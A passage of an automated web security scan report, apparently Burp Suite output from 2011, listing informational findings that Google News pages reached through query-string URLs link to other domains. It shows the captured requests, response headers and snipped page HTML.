<span class="title"><a target="_blank" class="usg-AFQjCNG-nV6zMsezwa-QK_0A3VhPil_jDg " href="http://news.blogs.cnn.com/2011/01/29/latest-developments-in-egypt-protests/" id="8192855583257227946"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGpe0YWLcMhGToUkvdiP0QGTnxLmw " href="http://www.huffingtonpost.com/2011/01/31/100-sled-dogs-slaughtered_n_816462.html" id="-6251657940687451944"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNG5Y4ry5KxkIqDJLqMYigo07i1Qbg " href="http://abcnews.go.com/International/conversation-pencils-promise/story?id=12788528" id="2877284770149748728"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHs7qCKsfuplhZS5aPuvqKYmqSwLA " href="http://www.nytimes.com/2011/01/31/business/media/31link.html?src=busln" id="-1623057392899693474"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHv9IHJ07AJGaoxREd39zOKV9Sxkg " href="http://www.huffingtonpost.com/2011/02/02/anderson-cooper-attacked-punched-egypt_n_817352.html" id="1856460484661458567"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEnBuuhLZERK_2W6H6nsSgw80Wk-g " href="http://www.nytimes.com/2011/02/01/technology/01apple.html" id="-613460227149434122"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGJa9QRLwgOKo7bAwB5Gt31D3Wuew " href="http://www.csmonitor.com/World/Backchannels/2011/0127/Joe-Biden-says-Egypt-s-Mubarak-no-dictator-he-shouldn-t-step-down" id="3610024583297189581"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNE6ybBw84x9uoypftV5tngJHzOltg " href="http://weeklyworldnews.com/headlines/27321/facebook-will-end-on-march-15th/" id="6382990014983290027"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNH2sLCkzb46FamCOb4ZMS00i_PyiA " href="http://www.artistdirect.com/entertainment-news/article/justin-bieber-s-never-say-never-to-change-music-films-forever/8692426" id="3075150691838224862"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGefgxSphxOT7DWIJfYen2FHqVKeA " href="http://www.huffingtonpost.com/2011/01/13/new-zodiac-sign-dates-oph_n_808567.html" id="2526493708698605676"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGguw_7ImLDpzcb2GdQY0b690KAjA " href="http://online.wsj.com/article/SB10001424052748704111504576059713528698754.html" id="6034302388163933602"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNG31ieJjehuVhbmm8A6VoEwB34ufg " href="http://news.blogs.cnn.com/2011/01/13/no-your-zodiac-sign-hasnt-changed/" id="-5002562622630809801"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHctKe5Y-WBhY6hGZFBttgAQRB3-Q " href="http://news.blogs.cnn.com/2011/01/11/snow-present-in-49-of-the-50-u-s-states/" id="1409758142476247527"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNFyXWaX3UnCdLqv5YPYdbvsndnWkg " href="http://www.guardian.co.uk/media/2011/jan/08/us-twitter-hand-icelandic-wikileaks-messages" id="-2612389445387481788"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEg2YQ-CnOIk7-f-z7Lru-oStXv_w " href="http://www.mtv.com/news/articles/1656968/justin-bieber-never-say-never-remixes.jhtml" id="7606504740284455591"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEsAW7PbJYh4ZG-Jgo93Mhsyq9HuQ " href="http://www.nytimes.com/2011/01/30/magazine/30Wikileaks-t.html" id="-6580393043011614512"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGDZBb2lM0F6JEZf_kTvhMmaZsIhw " href="http://www.nytimes.com/2011/01/09/business/09law.html?src=busln" id="-4132184762865514527"><span class="titletext">
...[SNIP]...
<div class="goog-menuitem" id="s-email"><img class="icon email-icon" src="http://www.gstatic.com/news/img/cleardot.gif" width="15" height="15" alt="Share story by email"><span class="sharing-link">
...[SNIP]...
<input type="hidden" id="s-reader-titleurl" value="url"><img class="share-icon-reader icon" src="http://www.gstatic.com/news/img/cleardot.gif" width="16" height="16" alt="Share story with Google Reader Share story"><span class="sharing-link">
...[SNIP]...
<input type="hidden" id="s-fb-titleurl" value="u"><img class="share-icon-facebook icon" src="http://www.gstatic.com/news/img/cleardot.gif" width="16" height="16" alt="Share story with Facebook Share story"><span class="sharing-link">
...[SNIP]...
<input type="hidden" id="s-twitter-shareurl" value="http://twitter.com/home"><img class="share-icon-twitter icon" src="http://www.gstatic.com/news/img/cleardot.gif" width="16" height="16" alt="Share story with Twitter Share story"><span class="sharing-link">
...[SNIP]...
<input type="hidden" id="s-buzz-titleurl" value="url"><img class="icon share-icon-buzz" src="http://www.gstatic.com/news/img/cleardot.gif" alt="Buzz this story"><span class="sharing-link">
...[SNIP]...
<a onclick="return false;" href="javascript:void(0);"><img class="icon home-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">
Make Google News my homepage</a>
...[SNIP]...
<a href="http://news.google.com/news?pz=1&amp;cf=all&amp;ned=us&amp;hl=en&amp;output=rss"><img class="icon feed-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">RSS</a>
...[SNIP]...
</a>&nbsp;- <a href="http://googlenewsblog.blogspot.com/">Blog</a>
...[SNIP]...

16.25. http://news.google.com/news/advanced_news_search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.google.com
Path:   /news/advanced_news_search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /news/advanced_news_search?pz=1&cf=all&ned=us&hl=en&q=bluefin+tuna HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Feb 2011 01:03:30 GMT
Expires: Thu, 03 Feb 2011 01:03:30 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
</title>
<link href="http://www.gstatic.com/news/img/favicon.ico" rel="icon" type="image/x-icon">


<script type="text/javascript">
...[SNIP]...
<a href="/news?pz=1&amp;ned=us"><img src="http://www.gstatic.com/news/img/logo/en_us/news.gif" width="171" height="40" alt="Google News"></a>
...[SNIP]...

16.26. http://news.google.com/news/directory  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.google.com
Path:   /news/directory

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /news/directory?pz=1&cf=all&ned=us&hl=en&sort=users HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Feb 2011 01:03:34 GMT
Expires: Thu, 03 Feb 2011 01:03:34 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
</title>
<link href="http://www.gstatic.com/news/img/favicon.ico" rel="icon" type="image/x-icon">
<link rel="alternate" type="application/rss+xml" href="http://news.google.com/news?pz=1&amp;cf=all&amp;ned=us&amp;hl=en&amp;csep=false&amp;num=10&amp;sort=users&amp;output=rss">
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&ned=us&tab=n1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<a href="/news?pz=1&amp;ned=us"><img src="http://www.gstatic.com/news/img/logo/en_us/news.gif" width="171" height="40" alt="Google News"></a>
...[SNIP]...
<a href="/news/directory?pz=1&amp;cf=all&amp;ned=us&amp;hl=en&amp;sort=users&amp;author=0&amp;csep=false&amp;csed=us" class="google-author"><img src="http://www.gstatic.com/news/img/701230376-author_logo.gif" alt=""></a>
...[SNIP]...
<a href="/news/directory?pz=1&amp;cf=all&amp;ned=us&amp;hl=en&amp;sort=users&amp;author=0&amp;csep=false&amp;csed=us" class="google-author"><img src="http://www.gstatic.com/news/img/701230376-author_logo.gif" alt=""></a>
...[SNIP]...
<a href="/news/directory?pz=1&amp;cf=all&amp;ned=us&amp;hl=en&amp;sort=users&amp;author=0&amp;csep=false&amp;csed=us" class="google-author"><img src="http://www.gstatic.com/news/img/701230376-author_logo.gif" alt=""></a>
...[SNIP]...
<a href="/news/directory?pz=1&amp;cf=all&amp;ned=us&amp;hl=en&amp;sort=users&amp;author=0&amp;csep=false&amp;csed=us" class="google-author"><img src="http://www.gstatic.com/news/img/701230376-author_logo.gif" alt=""></a>
...[SNIP]...
<a href="/news/directory?pz=1&amp;cf=all&amp;ned=us&amp;hl=en&amp;sort=users&amp;author=0&amp;csep=false&amp;csed=us" class="google-author"><img src="http://www.gstatic.com/news/img/701230376-author_logo.gif" alt=""></a>
...[SNIP]...
<a href="/news/directory?pz=1&amp;cf=all&amp;ned=us&amp;hl=en&amp;sort=users&amp;author=0&amp;csep=false&amp;csed=us" class="google-author"><img src="http://www.gstatic.com/news/img/701230376-author_logo.gif" alt=""></a>
...[SNIP]...
<a href="/news/directory?pz=1&amp;cf=all&amp;ned=us&amp;hl=en&amp;sort=users&amp;author=0&amp;csep=false&amp;csed=us" class="google-author"><img src="http://www.gstatic.com/news/img/701230376-author_logo.gif" alt=""></a>
...[SNIP]...
<a href="/news/directory?pz=1&amp;cf=all&amp;ned=us&amp;hl=en&amp;sort=users&amp;author=0&amp;csep=false&amp;csed=us" class="google-author"><img src="http://www.gstatic.com/news/img/701230376-author_logo.gif" alt=""></a>
...[SNIP]...
<a href="http://news.google.com/news?pz=1&amp;cf=all&amp;ned=us&amp;hl=en&amp;csep=false&amp;num=10&amp;sort=users&amp;output=rss"><img class="icon feed-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">RSS</a>
...[SNIP]...
</a>&nbsp;- <a href="http://googlenewsblog.blogspot.com/">Blog</a>
...[SNIP]...

16.27. http://news.google.com/news/more  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.google.com
Path:   /news/more

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /news/more?pz=1&cf=all&ned=us&ncl=dAylz1bdKU7uUjMe3QC4tv7E6GxTM HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Feb 2011 01:03:43 GMT
Expires: Thu, 03 Feb 2011 01:03:43 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
</title>
<link href="http://www.gstatic.com/news/img/favicon.ico" rel="icon" type="image/x-icon">
<link rel="alternate" type="application/rss+xml" href="http://news.google.com/news?pz=1&amp;cf=all&amp;ned=us&amp;hl=en&amp;ncl=dAylz1bdKU7uUjMe3QC4tv7E6GxTM&amp;output=rss">
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&ned=us&tab=n1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<a href="/news?pz=1&amp;ned=us"><img src="http://www.gstatic.com/news/img/logo/en_us/news.gif" width="171" height="40" alt="Google News"></a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHlrZSVNM6Zz6hhcU2h9fR5HO18TQ " href="http://www.kansascity.com/2011/01/10/2573323/earthtalk-are-atlantic-bluefin.html" id="MAA4AEgAUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHJgKrjx821lalk2U6xhw6rFd8OBw " href="http://search.japantimes.co.jp/cgi-bin/fl20110109x1.html" id="MAA4AEgBUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGo-CB9ZWSi7CQDkz5h4dPyoFpbkA " href="http://www.mpbn.net/News/MaineHeadlineNews/tabid/968/ctl/ViewItem/mid/3479/ItemId/14769/Default.aspx" id="MAA4AEgCUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<a onclick="return false;" href="javascript:void(0);"><img class="icon home-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">
Make Google News my homepage</a>
...[SNIP]...
<a href="http://news.google.com/news?pz=1&amp;cf=all&amp;ned=us&amp;hl=en&amp;ncl=dAylz1bdKU7uUjMe3QC4tv7E6GxTM&amp;output=rss"><img class="icon feed-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">RSS</a>
...[SNIP]...
</a>&nbsp;- <a href="http://googlenewsblog.blogspot.com/">Blog</a>
...[SNIP]...

16.28. http://news.google.com/news/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.google.com
Path:   /news/search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /news/search?pz=1&cf=all&ned=us&hl=en&q=author:%22Marah+Hardt%22&scoring=n HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Feb 2011 01:03:38 GMT
Expires: Thu, 03 Feb 2011 01:03:38 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
</title>
<link href="http://www.gstatic.com/news/img/favicon.ico" rel="icon" type="image/x-icon">
<link rel="alternate" type="application/rss+xml" href="http://news.google.com/news?pz=1&amp;cf=all&amp;ned=us&amp;hl=en&amp;q=author:%22Marah+Hardt%22&amp;cf=all&amp;scoring=n&amp;output=rss">
...[SNIP]...
</div><a href="http://www.youtube.com/results?q=author:%22Marah+Hardt%22&hl=en&ned=us&tab=n1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<a href="/news?pz=1&amp;ned=us"><img src="http://www.gstatic.com/news/img/logo/en_us/news.gif" width="171" height="40" alt="Google News"></a>
...[SNIP]...
<div class="thumbnail" style=""><a target="_self" href="http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi" class="usg-AFQjCNGpfdfO-WIJKvdFhiarue3EiinlOw " title="Change.org"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/jTNUn2OVcHDKyM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_self" href="http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi" class="usg-AFQjCNGpfdfO-WIJKvdFhiarue3EiinlOw "> Change.org </a>
...[SNIP]...
<h2 class="title"> <a target="_self" class="usg-AFQjCNGpfdfO-WIJKvdFhiarue3EiinlOw " href="http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi" id="MAA4AEgAUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_self" href="http://news.change.org/stories/women-and-us-mayorsthe-secret-weapons-for-solving-climate-change" class="usg-AFQjCNF2W5PA7B1R2e6qtr2OMGi4x3_d0g " title="Change.org (blog)"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/XqEGqBLBI0ppAM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_self" href="http://news.change.org/stories/women-and-us-mayorsthe-secret-weapons-for-solving-climate-change" class="usg-AFQjCNF2W5PA7B1R2e6qtr2OMGi4x3_d0g "> Change.org (blog) </a>
...[SNIP]...
<h2 class="title"> <a target="_self" class="usg-AFQjCNF2W5PA7B1R2e6qtr2OMGi4x3_d0g " href="http://news.change.org/stories/women-and-us-mayorsthe-secret-weapons-for-solving-climate-change" id="MAA4AEgBUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_self" href="http://environment.change.org/blog/view/2010_accidental_earth_experiment_prize_goes_tobp" class="usg-AFQjCNEkaL3gy-IIR2DEgOwNdnHl5VeLnQ " title="Change.org (blog)"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/YjaYkolKX6QsyM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_self" href="http://environment.change.org/blog/view/2010_accidental_earth_experiment_prize_goes_tobp" class="usg-AFQjCNEkaL3gy-IIR2DEgOwNdnHl5VeLnQ "> Change.org (blog) </a>
...[SNIP]...
<h2 class="title"> <a target="_self" class="usg-AFQjCNEkaL3gy-IIR2DEgOwNdnHl5VeLnQ " href="http://environment.change.org/blog/view/2010_accidental_earth_experiment_prize_goes_tobp" id="MAA4AEgCUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<li><a href="http://fastflip.googlelabs.com/search?client=news&amp;q=author:%22Marah+Hardt%22">Search Google Fast Flip for <b>
...[SNIP]...
<a onclick="return false;" href="javascript:void(0);"><img class="icon home-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">
Make Google News my homepage</a>
...[SNIP]...
<a href="http://news.google.com/news?pz=1&amp;cf=all&amp;ned=us&amp;hl=en&amp;q=author:%22Marah+Hardt%22&amp;cf=all&amp;scoring=n&amp;output=rss"><img class="icon feed-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">RSS</a>
...[SNIP]...
</a>&nbsp;- <a href="http://googlenewsblog.blogspot.com/">Blog</a>
...[SNIP]...

16.29. http://news.google.com/news/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.google.com
Path:   /news/search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /news/search?pz=1&cf=all&ned=us&hl=en&q=bluefin+tuna&start=20 HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Feb 2011 01:03:38 GMT
Expires: Thu, 03 Feb 2011 01:03:38 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
</title>
<link href="http://www.gstatic.com/news/img/favicon.ico" rel="icon" type="image/x-icon">
<link rel="alternate" type="application/rss+xml" href="http://news.google.com/news?pz=1&amp;cf=all&amp;ned=us&amp;hl=en&amp;q=bluefin+tuna&amp;cf=all&amp;output=rss">
...[SNIP]...
</div><a href="http://www.youtube.com/results?q=bluefin+tuna&hl=en&ned=us&tab=n1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<a href="/news?pz=1&amp;ned=us"><img src="http://www.gstatic.com/news/img/logo/en_us/news.gif" width="171" height="40" alt="Google News"></a>
...[SNIP]...
<div class="thumbnail" style=""><a target="_self" href="http://www.fis.com/fis/worldnews/worldnews.asp?l=e&amp;country=0&amp;special=&amp;monthyear=&amp;day=&amp;id=40335&amp;ndb=1&amp;df=0" class="usg-AFQjCNFMako-SkFocYk2ic1XDtXqYI1nUg " title="FIS"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/OzTKJ8O_yM764M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_self" href="http://www.fis.com/fis/worldnews/worldnews.asp?l=e&amp;country=0&amp;special=&amp;monthyear=&amp;day=&amp;id=40335&amp;ndb=1&amp;df=0" class="usg-AFQjCNFMako-SkFocYk2ic1XDtXqYI1nUg "> FIS </a>
...[SNIP]...
<h2 class="title"> <a target="_self" class="usg-AFQjCNFMako-SkFocYk2ic1XDtXqYI1nUg " href="http://www.fis.com/fis/worldnews/worldnews.asp?l=e&amp;country=0&amp;special=&amp;monthyear=&amp;day=&amp;id=40335&amp;ndb=1&amp;df=0" id="MAA4AEgAUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_self" class="usg-AFQjCNGrmaXn4rnBXnKkfUC9wmTg48EoCA " href="http://www.wcti12.com/news/26551757/detail.html" id="MAA4AEgBUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_self" class="usg-AFQjCNHxsLdgawpiVAxAjk7ENi_Z6IXMwQ " href="http://www.treehugger.com/files/2011/01/leading-chefs-join-bluefin-boycott-random-tuna-testing-high-mercury-levels.php" id="MAA4AEgCUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_self" class="usg-AFQjCNHOS3xw2PzACfpLt97inSnQ74ydSg " href="http://ecocentric.blogs.time.com/2011/02/02/oil-spill-kenneth-feinberg-sees-a-quick-recovery-for-the-gulf%E2%80%94so-get-your-money-now/" id="MAA4AEgDUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_self" class="usg-AFQjCNHhoftU0TyLEmqeAijohEg5fbd3Ag " href="http://www.shorelineplus.com/shplus/information/calendar/events/index.php?com=detail&amp;eID=31169&amp;year=2011&amp;month=01" id="MAA4AEgEUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_self" href="http://www.fis.com/fis/worldnews/worldnews.asp?monthyear=&amp;day=13&amp;id=40044&amp;l=e&amp;special=&amp;ndb=1%20target=" class="usg-AFQjCNGen2l9cZDwd1_8Aib54RwnYbt9YA " title="FIS"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/cwtzKZWqJViwUM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_self" href="http://www.fis.com/fis/worldnews/worldnews.asp?monthyear=&amp;day=13&amp;id=40044&amp;l=e&amp;special=&amp;ndb=1%20target=" class="usg-AFQjCNGen2l9cZDwd1_8Aib54RwnYbt9YA "> FIS </a>
...[SNIP]...
<h2 class="title"> <a target="_self" class="usg-AFQjCNGen2l9cZDwd1_8Aib54RwnYbt9YA " href="http://www.fis.com/fis/worldnews/worldnews.asp?monthyear=&amp;day=13&amp;id=40044&amp;l=e&amp;special=&amp;ndb=1%20target=" id="MAA4AEgFUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_self" class="usg-AFQjCNFaWAd9MO3euYklIuE8NWKdgE794w " href="http://www.thestandard.com.hk/news_detail.asp?we_cat=21&amp;art_id=107249&amp;sid=30978704&amp;con_type=1&amp;d_str=20110120&amp;fc=4" id="MAA4AEgGUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_self" class="usg-AFQjCNEcKMWRJQ5CzEWoUniRCJOlxZIA5A " href="http://www.abs-cbnnews.com/lifestyle/02/01/11/aqua-city-ocean-within-ocean-park" id="MAA4AEgHUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_self" href="http://www.thecuttingedgenews.com/index.php?article=31877&amp;pageid=28&amp;pagename=Sci-Tech" class="usg-AFQjCNGK35CzA4SyNidB32maC8t3Qz6dnQ " title="The Cutting Edge"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/_zhD_teCBgptzM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_self" href="http://www.thecuttingedgenews.com/index.php?article=31877&amp;pageid=28&amp;pagename=Sci-Tech" class="usg-AFQjCNGK35CzA4SyNidB32maC8t3Qz6dnQ "> The Cutting Edge </a>
...[SNIP]...
<h2 class="title"> <a target="_self" class="usg-AFQjCNGK35CzA4SyNidB32maC8t3Qz6dnQ " href="http://www.thecuttingedgenews.com/index.php?article=31877&amp;pageid=28&amp;pagename=Sci-Tech" id="MAA4AEgIUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_self" class="usg-AFQjCNG10CPSah2HK8alMlMjGvu-gcCxIQ " href="http://www.staradvertiser.com/editorials/20110110_Off_the_News.html" id="MAA4AEgJUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<li><a href="http://fastflip.googlelabs.com/search?client=news&amp;q=bluefin+tuna">Search Google Fast Flip for <b>
...[SNIP]...
<a onclick="return false;" href="javascript:void(0);"><img class="icon home-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">
Make Google News my homepage</a>
...[SNIP]...
<a href="http://news.google.com/news?pz=1&amp;cf=all&amp;ned=us&amp;hl=en&amp;q=bluefin+tuna&amp;cf=all&amp;output=rss"><img class="icon feed-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">RSS</a>
...[SNIP]...
</a>&nbsp;- <a href="http://googlenewsblog.blogspot.com/">Blog</a>
...[SNIP]...

16.30. http://news.google.com/news/section  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.google.com
Path:   /news/section

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /news/section?pz=1&cf=all&q=bluefin+tuna&ict=ln HTTP/1.1
Host: news.google.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
